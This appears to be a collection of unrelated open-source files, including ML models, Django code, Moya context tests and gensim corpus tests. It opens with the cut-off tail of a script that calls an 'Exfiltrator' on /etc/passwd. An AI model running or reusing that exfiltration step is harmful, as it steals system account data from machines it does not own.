audExf = Exfiltrator(file_path="/etc/passwd")
audExf.exfil()
|
python-package/setup.py | Priveyes/tgboost | 350 | 11178632 | <filename>python-package/setup.py<gh_stars>100-1000
from distutils.core import setup
setup(
name='tgboost',
version='1.0',
description='tiny gradient boosting tree',
author='wepon',
author_email='<EMAIL>',
url='http://wepon.me',
packages=['tgboost'],
package_data={'tgboost': ['tgboost.jar']},
package_dir={'tgboost': 'tgboost'},
)
|
pico8/game/formatter/rom.py | lifning/picotool | 310 | 11178633 | <filename>pico8/game/formatter/rom.py<gh_stars>100-1000
"""File formatter for .rom files"""
__all__ = [
'ROMFormatter',
]
from .base import BaseFormatter
# from .. import compress
# from ..game import Game
# from ... import util
# from ...lua.lua import Lua
# from ...gfx.gfx import Gfx
# from ...gff.gff import Gff
# from ...map.map import Map
# from ...sfx.sfx import Sfx
# from ...music.music import Music
# TODO: Refactor P8PNGFormatter to use this as a basis and separate out the
# PNG aspect. (It's the same data, P8PNG takes the extra step of merging with a
# label PNG file stegonographically.)
class ROMFormatter(BaseFormatter):
@classmethod
def from_file(cls, instr, filename=None, *args, **kwargs):
"""Reads a game from a .rom file.
Args:
instr: The input stream.
filename: The filename, if any, for tool messages.
Returns:
A Game containing the game data.
"""
raise NotImplementedError()
@classmethod
def to_file(
cls, game, outstr, lua_writer_cls=None, lua_writer_args=None,
filename=None, *args, **kwargs):
"""Writes a game to a .rom file.
Args:
game: The Game to write.
outstr: The output stream.
lua_writer_cls: The Lua writer class to use. If None, defaults to
LuaEchoWriter.
lua_writer_args: Args to pass to the Lua writer.
filename: The filename, if any, for tool messages.
"""
raise NotImplementedError()
|
components/isceobj/TopsProc/runCropOffsetGeo.py | vincentschut/isce2 | 1,133 | 11178672 | #
# Author: <NAME>
# Copyright 2016
#
import os
import isceobj
import logging
import numpy as np
from imageMath import IML
def runCropOffsetGeo(self):
'''
Crops and resamples lat/lon/los/z images created by topsApp to the
same grid as the offset field image.
'''
print('\n====================================')
print('Cropping topo products to offset grid...')
print('====================================')
suffix = '.full'
if (self.numberRangeLooks == 1) and (self.numberAzimuthLooks == 1):
suffix=''
flist1b = ['lat.rdr'+suffix, 'lon.rdr'+suffix, 'z.rdr'+suffix]
flist2b = [self._insar.mergedLosName+suffix]
wend = (self.offset_width*self.skipwidth) + self.offset_left
lend = (self.offset_length*self.skiphgt) + self.offset_top
for filename in flist1b:
print('\nCropping %s to %s ...\n' % (filename,filename+'.crop'))
f = os.path.join(self._insar.mergedDirname, filename)
outArr = []
mmap = IML.mmapFromISCE(f,logging)
'''
for i in range(self.offset_top, mmap.length, self.skiphgt):
outArr.append(mmap.bands[0][i][self.offset_left::self.skipwidth])
'''
for i in range(self.offset_top, lend, self.skiphgt):
outArr.append(mmap.bands[0][i][self.offset_left:wend:self.skipwidth])
outFile = os.path.join(self._insar.mergedDirname, filename+'.crop')
outImg = isceobj.createImage()
outImg.bands = 1
outImg.scheme = 'BIP'
outImg.dataType = 'DOUBLE'
outImg.setWidth(len(outArr[0]))
outImg.setLength(len(outArr))
outImg.setFilename(outFile)
with open(outFile,'wb') as fid:
for i in range(len(outArr)):
np.array(outArr[i]).astype(np.double).tofile(fid) ### WAY easier to write to file like this
outImg.renderHdr()
print('Cropped %s' % (filename))
for filename in flist2b:
print('\nCropping %s to %s ...\n' % (filename,filename+'.crop'))
f = os.path.join(self._insar.mergedDirname, filename)
outArrCh1 = []
outArrCh2 = []
mmap = IML.mmapFromISCE(f,logging)
'''
for i in range(self.offset_top, mmap.length, self.skiphgt):
outArrCh1.append(mmap.bands[0][i][self.offset_left::self.skipwidth])
outArrCh2.append(mmap.bands[1][i][self.offset_left::self.skipwidth])
'''
for i in range(self.offset_top, lend, self.skiphgt):
outArrCh1.append(mmap.bands[0][i][self.offset_left:wend:self.skipwidth])
outArrCh2.append(mmap.bands[1][i][self.offset_left:wend:self.skipwidth])
outFile = os.path.join(self._insar.mergedDirname, filename+'.crop')
outImg = isceobj.createImage()
outImg.bands = 2
outImg.scheme = 'BIL'
outImg.dataType = 'FLOAT'
outImg.setWidth(len(outArrCh1[0]))
outImg.setLength(len(outArrCh1))
outImg.setFilename(outFile)
with open(outFile,'wb') as fid:
for i in range(len(outArrCh1)):
np.array(outArrCh1[i]).astype(np.float32).tofile(fid)
np.array(outArrCh2[i]).astype(np.float32).tofile(fid)
outImg.renderHdr()
print('Cropped %s' % (filename))
if __name__ == "__main__":
'''
Default run method for runCropOffsetGeo.
'''
main()
|
models/network_dpsr.py | WestCityInstitute/KAIR | 1,521 | 11178675 | import math
import torch.nn as nn
import models.basicblock as B
"""
# --------------------------------------------
# modified SRResNet
# -- MSRResNet_prior (for DPSR)
# --------------------------------------------
References:
@inproceedings{zhang2019deep,
title={Deep Plug-and-Play Super-Resolution for Arbitrary Blur Kernels},
author={<NAME> and <NAME> and <NAME>},
booktitle={IEEE Conference on Computer Vision and Pattern Recognition},
pages={1671--1681},
year={2019}
}
@inproceedings{wang2018esrgan,
title={Esrgan: Enhanced super-resolution generative adversarial networks},
author={<NAME> and <NAME> <NAME> <NAME> <NAME> <NAME>},
booktitle={European Conference on Computer Vision (ECCV)},
pages={0--0},
year={2018}
}
@inproceedings{ledig2017photo,
title={Photo-realistic single image super-resolution using a generative adversarial network},
author={<NAME> Theis, <NAME>, <NAME>, <NAME>, <NAME> Acosta, <NAME>, <NAME> <NAME> and others},
booktitle={IEEE conference on computer vision and pattern recognition},
pages={4681--4690},
year={2017}
}
# --------------------------------------------
"""
# --------------------------------------------
# MSRResNet super-resolver prior for DPSR
# https://github.com/cszn/DPSR
# https://github.com/cszn/DPSR/blob/master/models/network_srresnet.py
# --------------------------------------------
class MSRResNet_prior(nn.Module):
def __init__(self, in_nc=4, out_nc=3, nc=96, nb=16, upscale=4, act_mode='R', upsample_mode='upconv'):
super(MSRResNet_prior, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
m_head = B.conv(in_nc, nc, mode='C')
m_body = [B.ResBlock(nc, nc, mode='C'+act_mode+'C') for _ in range(nb)]
m_body.append(B.conv(nc, nc, mode='C'))
if upsample_mode == 'upconv':
upsample_block = B.upsample_upconv
elif upsample_mode == 'pixelshuffle':
upsample_block = B.upsample_pixelshuffle
elif upsample_mode == 'convtranspose':
upsample_block = B.upsample_convtranspose
else:
raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))
if upscale == 3:
m_uper = upsample_block(nc, nc, mode='3'+act_mode)
else:
m_uper = [upsample_block(nc, nc, mode='2'+act_mode) for _ in range(n_upscale)]
H_conv0 = B.conv(nc, nc, mode='C'+act_mode)
H_conv1 = B.conv(nc, out_nc, bias=False, mode='C')
m_tail = B.sequential(H_conv0, H_conv1)
self.model = B.sequential(m_head, B.ShortcutBlock(B.sequential(*m_body)), *m_uper, m_tail)
def forward(self, x):
x = self.model(x)
return x
class SRResNet(nn.Module):
def __init__(self, in_nc=3, out_nc=3, nc=64, nb=16, upscale=4, act_mode='R', upsample_mode='upconv'):
super(SRResNet, self).__init__()
n_upscale = int(math.log(upscale, 2))
if upscale == 3:
n_upscale = 1
m_head = B.conv(in_nc, nc, mode='C')
m_body = [B.ResBlock(nc, nc, mode='C'+act_mode+'C') for _ in range(nb)]
m_body.append(B.conv(nc, nc, mode='C'))
if upsample_mode == 'upconv':
upsample_block = B.upsample_upconv
elif upsample_mode == 'pixelshuffle':
upsample_block = B.upsample_pixelshuffle
elif upsample_mode == 'convtranspose':
upsample_block = B.upsample_convtranspose
else:
raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))
if upscale == 3:
m_uper = upsample_block(nc, nc, mode='3'+act_mode)
else:
m_uper = [upsample_block(nc, nc, mode='2'+act_mode) for _ in range(n_upscale)]
H_conv0 = B.conv(nc, nc, mode='C'+act_mode)
H_conv1 = B.conv(nc, out_nc, bias=False, mode='C')
m_tail = B.sequential(H_conv0, H_conv1)
self.model = B.sequential(m_head, B.ShortcutBlock(B.sequential(*m_body)), *m_uper, m_tail)
def forward(self, x):
x = self.model(x)
return x |
mmdet3d/models/sst/sra_block.py | collector-m/SST | 217 | 11178682 | import torch
import torch.nn as nn
from torch.utils.checkpoint import checkpoint
from mmcv.runner import auto_fp16
from mmcv.cnn import build_norm_layer
from mmdet3d.ops import flat2window, window2flat, SRATensor, DebugSRATensor, spconv
from ipdb import set_trace
import os
import pickle as pkl
class WindowAttention(nn.Module):
def __init__(self, d_model, nhead, dropout, batch_first=False, layer_id=None):
super().__init__()
self.nhead = nhead
# from mmdet3d.models.transformer.my_multi_head_attention import MyMultiheadAttention
# self.self_attn = MyMultiheadAttention(d_model, nhead, dropout=dropout, batch_first=False)
self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
self.layer_id = layer_id
def forward(self, sra_tensor, do_shift):
'''
Args:
Out:
shifted_feat_dict: the same type as window_feat_dict
'''
assert isinstance(sra_tensor, SRATensor)
out_feat_dict = {}
win_feat_dict, mask_dict = sra_tensor.window_tensor(do_shift)
pos_dict = sra_tensor.position_embedding(do_shift)
for name in win_feat_dict:
# [n, num_token, embed_dim]
pos = pos_dict[name]
pos = pos.permute(1, 0, 2)
feat_3d = win_feat_dict[name]
feat_3d = feat_3d.permute(1, 0, 2)
key_padding_mask = mask_dict[name]
v = feat_3d
q = k = feat_3d + pos
out_feat_3d, attn_map = self.self_attn(q, k, value=v, key_padding_mask=key_padding_mask)
out_feat_dict[name] = out_feat_3d.permute(1, 0, 2)
sra_tensor.update(out_feat_dict)
return sra_tensor
class EncoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
activation="relu", batch_first=False, layer_id=None, mlp_dropout=0):
super().__init__()
assert not batch_first, 'Current version of PyTorch does not support batch_first in MultiheadAttention. After upgrading pytorch, do not forget to check the layout of MLP and layer norm to enable batch_first option.'
self.batch_first = batch_first
self.win_attn = WindowAttention(d_model, nhead, dropout, layer_id=layer_id)
# Implementation of Feedforward model
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.dropout = nn.Dropout(mlp_dropout)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.dropout1 = nn.Dropout(mlp_dropout)
self.dropout2 = nn.Dropout(mlp_dropout)
self.activation = _get_activation_fn(activation)
self.fp16_enabled=True
# @auto_fp16(apply_to=('att_input'))
def forward(
self,
input,
do_shift
):
assert isinstance(input, SRATensor)
src = input.features
output = self.win_attn(input, do_shift) #[N, d_model]
src2 = output.features
src = src + self.dropout1(src2)
src = self.norm1(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = src + self.dropout2(src2)
src = self.norm2(src)
output.set_features(src)
# output = spconv.SparseConvTensor(src, att_input.indices, None, None)
# att_output.features = src
return output
class SRABlock(nn.Module):
''' Consist of two encoder layer, shift and shift back.
'''
def __init__(self, key, d_model, nhead, dim_feedforward, window_shape, dropout=0.1,
activation="relu", batch_first=False, block_id=-100):
super().__init__()
# SRABlock(d_model[i], nhead[i], dim_feedforward[i], window_shape
# dropout, activation, batch_first=False, block_id=i)
encoder_1 = EncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first, layer_id=block_id * 2 + 0)
encoder_2 = EncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first, layer_id=block_id * 2 + 1)
# BasicShiftBlock(d_model[i], nhead[i], dim_feedforward[i], dropout, activation, batch_first=False)
self.encoder_list = nn.ModuleList([encoder_1, encoder_2])
self.window_shape = window_shape
self.key = key
def forward(
self,
input,
batching_info,
using_checkpoint=False,
):
assert isinstance(input, SRATensor)
output = input
if not output.ready:
output.setup(batching_info, self.key, self.window_shape, 10000)
for i in range(2):
layer = self.encoder_list[i]
if using_checkpoint:
output = checkpoint(layer, output, i == 1)
else:
output = layer(output, i == 1)
return output
def _get_activation_fn(activation):
"""Return an activation function given a string"""
if activation == "relu":
return torch.nn.functional.relu
if activation == "gelu":
return torch.nn.functional.gelu
if activation == "glu":
return torch.nn.functional.glu
raise RuntimeError(F"activation should be relu/gelu, not {activation}.") |
sponsors/migrations/0031_auto_20210810_1232.py | ewjoachim/pythondotorg | 911 | 11178683 | # Generated by Django 2.0.13 on 2021-08-10 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0030_auto_20210715_2023'),
]
operations = [
migrations.AlterField(
model_name='sponsorcontact',
name='administrative',
field=models.BooleanField(default=False, help_text='Administrative contacts will only be notified regarding contracts.'),
),
migrations.AlterField(
model_name='sponsorcontact',
name='primary',
field=models.BooleanField(default=False, help_text='The primary contact for a sponsorship will be responsible for managing deliverables we need to fulfill benefits. Primary contacts will receive all email notifications regarding sponsorship.'),
),
]
|
frontend/context_processors.py | hungbbear/spleeter-web | 202 | 11178746 | <gh_stars>100-1000
import os
def debug(context):
return {'DJANGO_DEVELOPMENT': os.getenv('DJANGO_DEVELOPMENT')}
|
moya/tests/test_context.py | moyaproject/moya | 129 | 11178764 | <filename>moya/tests/test_context.py
from __future__ import unicode_literals
from __future__ import print_function
import unittest
from moya.context import Context
from moya.context import dataindex
class TestDataIndex(unittest.TestCase):
def test_parse(self):
"""Test dataindex parse"""
tests = [
("", []),
(".", []),
('""', [""]),
("\\\\", ["\\"]),
("foo", ["foo"]),
("foo.bar", ["foo", "bar"]),
(".foo.bar", ["foo", "bar"]),
("foo.bar.baz", ["foo", "bar", "baz"]),
('"foo"', ["foo"]),
('"foo".bar', ["foo", "bar"]),
('"foo.bar"', ["foo.bar"]),
("foo\.bar", ["foo.bar"]),
("1", [1]),
('"1"', ["1"]),
("foo.2", ["foo", 2]),
]
for index, parsed in tests:
self.assertEqual(dataindex.parse(index), parsed)
def test_build(self):
"""Test encoding indices as a dataindex string"""
self.assertEqual(dataindex.build(["Hello", "World", 1]), "Hello.World.1")
self.assertEqual(dataindex.build(["Hello"]), "Hello")
def test_join(self):
"""Test joining of indices"""
self.assertEqual(dataindex.join("foo"), "foo")
self.assertEqual(dataindex.join("foo", "bar.baz"), "foo.bar.baz")
self.assertEqual(dataindex.join("foo", "bar\.baz"), 'foo."bar.baz"')
self.assertEqual(dataindex.join("foo", '"bar.baz"'), 'foo."bar.baz"')
self.assertEqual(dataindex.join("foo", "bar.baz.1:5"), "foo.bar.baz.1:5")
self.assertEqual(dataindex.join("foo", "bar", "baz"), "foo.bar.baz")
self.assertEqual(dataindex.join("foo", ["bar", "baz"]), "foo.bar.baz")
self.assertEqual(dataindex.join(".foo", "bar", "baz"), ".foo.bar.baz")
self.assertEqual(dataindex.join("foo", ".bar", "baz"), ".bar.baz")
def test_normalize(self):
"""Test normalizing indices"""
self.assertEqual(dataindex.normalize("foo"), "foo")
self.assertEqual(dataindex.normalize(r"\foo"), "foo")
self.assertEqual(dataindex.normalize(r"\f\o\o"), "foo")
self.assertEqual(dataindex.normalize('"foo"'), "foo")
def test_make_absolute(self):
"""Test making a data index absolute"""
self.assertEqual(dataindex.make_absolute("foo.bar"), ".foo.bar")
self.assertEqual(dataindex.make_absolute(".foo.bar"), ".foo.bar")
def test_iter_index(self):
"""Test iter_index method"""
self.assertEqual(
list(dataindex.iter_index("foo.bar.baz")),
[("foo", "foo"), ("bar", "foo.bar"), ("baz", "foo.bar.baz")],
)
class TestContext(unittest.TestCase):
def setUp(self):
pass
def test_basic_root(self):
"""Test basic operations from root"""
c = Context()
c["foo"] = "bar"
self.assert_("foo" in c)
self.assertEqual(c["foo"], "bar")
self.assertEqual(c.root["foo"], "bar")
c["fruit"] = "apple"
self.assert_("fruit" in c)
self.assertEqual(c["fruit"], "apple")
self.assertEqual(c.root["fruit"], "apple")
self.assertEqual(c.get("nothere", "missing"), "missing")
self.assertEqual(sorted(c.keys()), ["foo", "fruit"])
self.assertEqual(sorted(c.values()), ["apple", "bar"])
self.assertEqual(sorted(c.items()), [("foo", "bar"), ("fruit", "apple")])
def test_attr(self):
"""Test attribute / getitem distinction"""
class A(object):
foo = "buzz"
bar = "cantsee"
def __getitem__(self, key):
if key == "foo":
return "baz"
raise IndexError(key)
def __contains__(self, key):
return key == "foo"
c = Context()
c["a"] = A()
self.assertEqual(c["a.foo"], "baz")
self.assert_(c["a.bar"].moya_missing)
# self.assertRaises(errors.ContextKeyError, c.__getitem__, "a.bar")
self.assert_("a.bar" not in c)
self.assert_("a.foo" in c)
def test_get_root(self):
"""Test looking up root object"""
c = Context({"foo": [1, 2, 3]})
self.assertEqual(c[""], {"foo": [1, 2, 3]})
c.push_frame("foo")
self.assertEqual(c[""], [1, 2, 3])
c.push_frame(".foo")
self.assertEqual(c[""], [1, 2, 3])
c.push_frame(".")
self.assertEqual(c[""], {"foo": [1, 2, 3]})
def test_inspect(self):
"""Test keys/values/items"""
c = Context()
c["foo"] = dict(a=1, b=2, c=3)
c["bar"] = ["a", "b", "c"]
def compare(a, b):
a = sorted(a, key=lambda k: str(k.__class__.__name__))
b = sorted(b, key=lambda k: str(k.__class__.__name__))
for compare_a, compare_b in zip(a, b):
self.assertEqual(compare_a, compare_b)
self.assertEqual(sorted(c.keys()), ["bar", "foo"])
self.assertEqual(sorted(c.keys("foo")), ["a", "b", "c"])
self.assertEqual(sorted(c.keys("bar")), [0, 1, 2])
compare((c.values()), [dict(a=1, b=2, c=3), ["a", "b", "c"]])
self.assertEqual(sorted(c.values("foo")), [1, 2, 3])
self.assertEqual(sorted(c.values("bar")), ["a", "b", "c"])
compare(
sorted(c.items()),
sorted([("foo", dict(a=1, b=2, c=3)), ("bar", ["a", "b", "c"])]),
)
self.assertEqual(sorted(c.items("foo")), [("a", 1), ("b", 2), ("c", 3)])
self.assertEqual(sorted(c.items("bar")), [(0, "a"), (1, "b"), (2, "c")])
self.assertEqual(
sorted(c.all_keys()),
sorted(
["", "foo", "foo.a", "foo.c", "foo.b", "bar", "bar.0", "bar.1", "bar.2"]
),
)
def test_frame_stack(self):
"""Test push/pop frame operations"""
c = Context()
c["foo"] = {}
c.push_frame("foo")
self.assertEqual(c.get_frame(), ".foo")
c["bar"] = 1
self.assertEqual(c.root["foo"]["bar"], 1)
c.pop_frame()
self.assertEqual(c.get_frame(), ".")
c["baz"] = 2
self.assertEqual(c.root["baz"], 2)
def test_root_indices(self):
"""Test root indices"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c.push_frame("foo") # In .foo
c["bar"] = 1
self.assertEqual(c[".baz"], 2)
self.assertEqual(c["bar"], 1)
c.push_frame(".") # In .
self.assertEqual(c["baz"], 2)
self.assertEqual(c["foo.bar"], 1)
c.pop_frame() # In .foo
self.assertEqual(c[".baz"], 2)
self.assertEqual(c["bar"], 1)
self.assertEqual(c[".foo.bar"], 1)
def test_expressions(self):
"""Test expression evaluation"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c["foo.a"] = 10
c["foo.b"] = 20
c["foo.c"] = dict(inception="three levels")
c["word"] = "apples"
c["word2"] = c["word"]
c["lt"] = "less than"
class ChoiceTest(object):
def __init__(self):
self.choices = []
c["choicetest"] = ChoiceTest()
class Obj(object):
def __init__(self, id):
self.id = id
c["objects"] = [Obj(1), Obj(2), Obj(3)]
tests = [
("1", 1),
("123", 123),
('"1"', "1"),
("'1'", "1"),
('"\\""', '"'),
("'''1'''", "1"),
('"""1"""', "1"),
("100-5", 95),
("7//2", 3),
("1+1", 2),
("1+2+3", 6),
("2+3*2", 8),
("(2+3)*2", 10),
("foo.a", 10),
("$foo.a", 10),
("$lt", "less than"),
("foo.c.inception", "three levels"),
# ('foo.c.inception.:5 + " "+"little pigs"', "three little pigs"),
# ('foo.c.inception.::-1', "slevel eerht"),
("foo.a+foo.b", 30),
(".foo.a+.foo.b", 30),
("foo.a/2", 5),
("foo.a/4", 2.5),
("word*3", "applesapplesapples"),
("word.2*3", "ppp"),
("word+str:2", "apples2"),
('word^="a"', True),
('word^="app"', True),
('word^="ppa"', False),
('word$="les"', True),
('word$="s"', True),
("2!=3", True),
("2>1", True),
("1<2", True),
("1>2", False),
("3<1", False),
("1==1", True),
("10>=10", True),
("9.9<=10", True),
("foo.a==10", True),
('foo.a=="a"', False),
("foo.a=='a'", False),
("3*2>5", True),
("2 gt 1", True),
("1 lt 2", True),
("1 gt 2", False),
("3 lt 1", False),
("10 gte 10", True),
("9.9 lte 10", True),
("3*2 gt 5", True),
("None", None),
("True", True),
("False", False),
("yes", True),
("no", False),
('int:"3"', 3),
("str:50", "50"),
('float:"2.5"', 2.5),
('bool:"test"', True),
("bool:1", True),
('bool:""', False),
("isint:5", True),
('isint:"5"', False),
("isnumber:2", True),
("isnumber:2.5", True),
('isnumber:"a"', False),
("isfloat:1.0", True),
("isfloat:1", False),
("isstr:1", False),
('isstr:"a"', True),
("isbool:True", True),
("isbool:False", True),
("isbool:(2+1)", False),
("isbool:bool:1", True),
("isbool:bool:0", True),
("len:word", 6),
("True and True", True),
("False and False", False),
("True or False", True),
("False or False", False),
# ('2>1 and word.-1=="s"', True),
('word=="apples"', True),
('1==2 or word=="apples"', True),
("'a' in 'apples'", True),
("'ppl' in 'apples'", True),
("word.1==word.2", True),
("word is word2", True),
("'index.html' fnmatches '*.html'", True),
("'foo/index.html' fnmatches '*.html'", True),
("'index.html' fnmatches '*.py'", False),
("'index.html' fnmatches '*.h??l'", True),
("'hello, world' matches /.*world/", True),
("'hello, will' matches /.*world/", False),
("'hello, world' matches '.*world'", True),
("'hello, will' matches '.*world'", False),
("'inception' in foo['c']", True),
("'inception' in (foo['c'])", True),
("exists:foo", True),
("exists:baz", True),
("exists:asdfsadf", False),
("missing:foo", False),
("missing:nobodyherebutuschickens", True),
("missing:yesterday", True),
("missing:foo.bar.baz", True),
("missing:andrew", True),
("'1' instr [1,2,3,4]", True),
("'5' instr [1,2,3,4]", False),
("'1' not instr [1,2,3,4]", False),
("'5' not instr [1,2,3,4]", True),
("1 in None", False),
("1 instr None", False),
("a=1", {"a": 1}),
('{"a":1}', {"a": 1}),
("[1,2,3]", [1, 2, 3]),
("[1,2,3,[4,5,6]]", [1, 2, 3, [4, 5, 6]]),
("[1,2,3,[4,5,6,[7,8,9]]]", [1, 2, 3, [4, 5, 6, [7, 8, 9]]]),
("[1]", [1]),
("[]", []),
("d:'5'", 5),
("d:'5' + 1", 6),
("d:'5' + d:'1'", 6),
("debug:d:5", "d:'5'"),
("filesize:1024", "1.0 KB"),
("abs:-3.14", 3.14),
('basename:"/foo/bar/baz"', "baz"),
('bool:""', False),
('capitalize:"hello"', "Hello"),
("ceil:3.14", 4),
("choices:choicetest", []),
("chain:[[1, 2], [3, 4]]", [1, 2, 3, 4]),
("chr:65", "A"),
("collect:[['hello', 'world'], 0]", ["h", "w"]),
(
"sorted:items:collectmap:[['hello', 'world'], 0]",
[("h", "hello"), ("w", "world")],
),
("collectids:objects", [1, 2, 3]),
("commalist:['hello', 'world']", "hello,world"),
("commaspacelist:['hello', 'world']", "hello, world"),
("'hello\\nworld'", "hello\nworld"),
(r"'you can \"quote me\" on that'", 'you can "quote me" on that'),
("'\\\\'", "\\"),
("'helloworld'[1]", "e"),
("'helloworld'[-1]", "d"),
("'helloworld'[:2]", "he"),
("'helloworld'[2:4]", "ll"),
("'helloworld'[::-1]", "dlrowolleh"),
]
for expression, result in tests:
print(expression, result)
expression_result = c.eval(expression)
print("\t", expression_result)
self.assertEqual(expression_result, result)
def test_expression_index(self):
"""Test the index operator"""
c = Context()
c["foo"] = {}
c["baz"] = 2
c["foo.a"] = 10
c["foo.b"] = 20
c["foo.c"] = dict(inception="three levels")
c["word"] = "apples"
c["word2"] = c["word"]
c["lt"] = "less than"
class Obj(object):
def __init__(self):
self.n = 123
self.foo = ["Hello", "World", "!"]
c["o"] = Obj()
tests = [
('"apples"[0]', "a"),
('"apples"[1]', "p"),
('"apples"[1+2]', "l"),
('"apples"[-1]', "s"),
('foo["a"]', 10),
('foo["b"]', 20),
('foo["c"]', dict(inception="three levels")),
('foo["c"]["inception"]', "three levels"),
('foo.c["inception"]', "three levels"),
('foo.c["inception"][1]', "h"),
('o["n"]', 123),
('o["foo"][1]', "World"),
]
for expression, result in tests:
print(expression)
expression_result = c.eval(expression)
self.assertEqual(expression_result, result)
# expression_result_callable = c.compile(expression)
# self.assertEqual(expression_result_callable(), result)
def test_expression_filter(self):
"""Test filter evaluation"""
c = Context()
c["filter"] = dict(double=lambda v: v * 2, square=lambda v: v * v)
c["data"] = dict(a=1, b=10, c=123)
tests = [
("3|filter.double", 6),
("3|.filter.double", 6),
("data.a + data.b|filter.double", 22),
("(data.a + data.b)|filter.double", 22),
("3|filter.square", 9),
("3|filter.double|filter.square", 36),
]
for expression, result in tests:
print(expression)
expression_result = c.eval(expression)
self.assertEqual(expression_result, result)
# expression_result_callable = c.compile(expression)
# self.assertEqual(expression_result_callable(), result)
def test_expressions_with_fame(self):
"""Test expression evaluation in a frame"""
c = Context()
c["foo"] = dict(a=1, b=2, bar="apples")
c["top"] = 10
c["r"] = list(range(10))
tests = [("a+b", 3), (".top", 10), ("a+.top", 11), (".r.4+.top", 14)]
with c.frame("foo"):
for expression, result in tests:
self.assertEqual(c.eval(expression), result)
def test_set_lazy(self):
"""Test lazy evaluation"""
c = Context()
evaluations = [0]
def add(a, b):
evaluations[0] += 1
return a + b
c.set_lazy("foo", add, 3, 4)
self.assertEqual(evaluations[0], 0)
self.assertEqual(c["foo"], 7)
self.assertEqual(evaluations[0], 1)
self.assertEqual(c["foo"], 7)
self.assertEqual(evaluations[0], 1)
c.set_lazy("bar", lambda: {})
self.assertEqual(c["bar"], {})
def test_set_async(self):
"""Test asyncronous evaluation"""
c = Context()
c.set_async("foo", lambda: "bar")
self.assertEqual(c["foo"], "bar")
self.assertEqual(c["foo"], "bar")
def waiter(wait_time, result):
import time
time.sleep(wait_time)
return result
c.set_async("bestthings", waiter, 0.1, "guiness")
self.assertEqual(c["bestthings"], "guiness")
self.assertEqual(c["bestthings"], "guiness")
def test_set_new(self):
"""Test setting values if not present"""
c = Context()
c.set_new("foo", {})
self.assertEqual(c["foo"], {})
c.set_new("foo", 100)
self.assertEqual(c["foo"], {})
def test_deleting(self):
"""Test deleting from context"""
c = Context()
c["foo"] = {}
c["foo.bar"] = 1
c["foo.baz"] = 2
self.assert_("foo" in c)
self.assert_("foo.bar" in c)
self.assert_("foo.baz" in c)
del c["foo.bar"]
self.assert_("foo" in c)
self.assert_("foo.bar" not in c)
self.assert_("foo.baz" in c)
del c["foo"]
self.assert_("foo" not in c)
self.assert_("foo.bar" not in c)
self.assert_("foo.baz" not in c)
def test_copy_move(self):
"""Test copying and moving values"""
c = Context()
c["foo"] = 123
c["bar"] = {}
c["bar.baz"] = 456
c.copy("foo", "foo2")
self.assertEqual(c["foo"], 123)
self.assertEqual(c["foo2"], 123)
with c.frame("bar"):
c.copy("baz", ".zab")
self.assertEqual(c["zab"], 456)
c = Context()
c["foo"] = 123
c["bar"] = {}
self.assert_("foo" in c)
c.move("foo", "bar.foo")
self.assert_("foo" not in c)
self.assert_("bar.foo" in c)
self.assertEqual(c["bar.foo"], 123)
def test_scope(self):
"""Test scope facility"""
c = Context()
c["foo"] = dict(a=1, b=2)
c["bar"] = {}
c.push_frame(".foo")
self.assertEqual(c["a"], 1)
self.assertEqual(c["b"], 2)
self.assert_("c" not in c)
c.push_scope(".bar")
c[".bar.c"] = 3
self.assert_("c" in c)
self.assertEqual(c["c"], 3)
c.pop_scope()
self.assert_("c" not in c)
self.assertEqual(c["a"], 1)
self.assertEqual(c["b"], 2)
def test_stack(self):
c = Context()
c.push_stack("content", "foo")
self.assertEqual(c[".content"], "foo")
c.push_stack("content", "bar")
self.assertEqual(c[".content"], "bar")
value = c.pop_stack("content")
self.assertEqual(value, "bar")
self.assertEqual(c[".content"], "foo")
value = c.pop_stack("content")
self.assertEqual(value, "foo")
self.assert_(c[".content"] is None)
|
TWE-3/gensim/test/test_corpora.py | sysuhu/topical_word_embeddings | 330 | 11178825 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 <NAME> <<EMAIL>>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking corpus I/O formats (the corpora package).
"""
import logging
import os.path
import unittest
import tempfile
import itertools
from gensim.corpora import (bleicorpus, mmcorpus, lowcorpus, svmlightcorpus,
ucicorpus, malletcorpus, textcorpus)
# needed because sample data files are located in the same folder
module_path = os.path.dirname(__file__)
datapath = lambda fname: os.path.join(module_path, 'test_data', fname)
def testfile():
# temporary data will be stored to this file
return os.path.join(tempfile.gettempdir(), 'gensim_corpus.tst')
class CorpusTestCase(unittest.TestCase):
TEST_CORPUS = [[(1, 1.0)], [], [(0, 0.5), (2, 1.0)], []]
def run(self, result=None):
if type(self) is not CorpusTestCase:
super(CorpusTestCase, self).run(result)
def tearDown(self):
# remove all temporary test files
fname = testfile()
extensions = ['', '', '.bz2', '.gz', '.index', '.vocab']
for ext in itertools.permutations(extensions, 2):
try:
os.remove(fname + ext[0] + ext[1])
except OSError:
pass
def test_load(self):
fname = datapath('testcorpus.' + self.file_extension.lstrip('.'))
corpus = self.corpus_class(fname)
docs = list(corpus)
# the deerwester corpus always has nine documents
self.assertEqual(len(docs), 9)
def test_empty_input(self):
with open(testfile(), 'w') as f:
f.write('')
with open(testfile() + '.vocab', 'w') as f:
f.write('')
corpus = self.corpus_class(testfile())
self.assertEqual(len(corpus), 0)
docs = list(corpus)
self.assertEqual(len(docs), 0)
def test_save(self):
corpus = self.TEST_CORPUS
# make sure the corpus can be saved
self.corpus_class.save_corpus(testfile(), corpus)
# and loaded back, resulting in exactly the same corpus
corpus2 = list(self.corpus_class(testfile()))
self.assertEqual(corpus, corpus2)
